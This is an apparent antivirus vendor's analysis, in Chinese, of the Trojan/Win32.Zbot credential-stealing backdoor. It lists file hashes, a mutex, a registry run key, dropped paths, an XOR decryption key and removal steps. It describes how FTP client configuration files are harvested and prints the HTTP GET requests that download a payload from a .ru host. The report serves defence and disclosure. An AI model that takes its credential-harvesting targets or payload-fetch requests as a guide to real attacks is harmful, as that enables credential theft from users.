一、 病毒标签:
病毒名称: Trojan/Win32.Zbot.akas[Spy]
病毒类型: 后门
文件 MD5: 23C77C4C29158FEA0E0E805EEF535571
公开范围: 完全公开
危害等级: 4
文件长度: 232,501 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: UPX
二、 病毒描述:
该恶意代码文件为后门类木马,病毒运行后API函数设置隐藏内存报错窗口,创建互斥体防止多次运行,去掉对第一个节表004120FD处开始688字节的内存保护,对这段内存数据进行异或解密 ,解密完毕之后将这段内存属性改为可读可写,在系统目录下创建2个随机5个英文字母的目录,并在2个随机名目录内各衍生一个病毒文件,创建注册表项、获取系统版本信息,调用衍生的病毒EXE文件,调用CMD命令行删除自身原文件,该病毒获取Windows登陆账号信息和FTP账户信息,试图将账号发送到病毒作者远程计算机
三、 行为分析:
本地行为:
1、衍生相同文件到以下目录分别命名为
%Documents and Settings%\当前用户\Application Data\Byyn\bifo.exe (随机名)
%Documents and Settings%\当前用户\Application Data\Tuybva\kyhif.tmp (随机名)
%Documents and Settings%\当前用户\Application Data\Tuybva\kyhif.ifl (随机名)
2、病毒运行后API函数设置隐藏内存报错窗口,创建互斥体MutexName = "Global\{FD0D3DE9-967C-0BBF-F2E4-201E41102BA0}"防止多次运行,去掉对第一个节表004120FD处开始688字节的内存保护,对这段内存数据进行异或解密密钥为6F 14 7D F3 4个字节,遍历磁盘目录%Documents and Settings%\All Users\Application Data查找"*flashfxp*"目录,找到之后试图获取FTP的 IP port USER PASS等账户信息,遍历%Windir%目录下是否有wcx_ftp.ini文件如果有则读取该文件内的connections default host username password等信息,读取ftplist.txt文件;server= ;port= ;user= ;password=等变量账户信息,另外还读取多个FTP软件的配置文件账户信息,试图修改火狐浏览器的profiles.ini、user.js等文件,将获取的FTP账户信息和Windows登陆账号信息以POST方式发送到病毒作者地址中。
3、添加注册表启动项
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{85A601B1-AA24-7314-F2E4-201E41102BA0}
值: 字符串: ""C:\Documents and Settings\a\Application Data\Byyn\bifo.exe""
网络行为:
连接以下URL获取数据:
GET /?HOST=phaizeipeu.ru&R=/bin/huegh***.bin& HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Cache-Control: no-cache
Host: phaizei***.ru:8080 (该网址已失效)
GET /bin/huegh***.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: phaizeipeu.ru
Cache-Control: no-cache (该网址已失效)
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
%Windir% WINDODWS所在目录
%DriveLetter% 逻辑驱动器根目录
%ProgramFiles% 系统程序默认安装目录
%HomeDrive% 当前启动的系统的所在分区
%Documents and Settings% 当前用户文档根目录
%Temp% \Documents and Settings
\当前用户\Local Settings\Temp
%System32% 系统的 System32文件夹
Windows2000/NT中默认的安装路径是C:\Winnt\System32
windows95/98/me中默认的安装路径是C:\Windows\System
windowsXP中默认的安装路径是C:\Windows\System32
四、 清除方案:
1、使用安天木马防线可彻底清除此病毒(推荐)。
请到安天网站下载:http://www.antiy.com
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1) 使用ATOOL“进程管理”关闭病毒相关进程
(2) 强行删除病毒文件
%Documents and Settings%\当前用户\Application Data\Byyn\bifo.exe (随机名)
%Documents and Settings%\当前用户\Application Data\Tuybva\kyhif.tmp (随机名)
%Documents and Settings%\当前用户\Application Data\Tuybva\kyhif.ifl (随机名)
(3) 恢复病毒修改的注册表
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{85A601B1-AA24-7314-F2E4-201E41102BA0}
值: 字符串: ""C:\Documents and Settings\a\Application Data\Byyn\bifo.exe"" |
|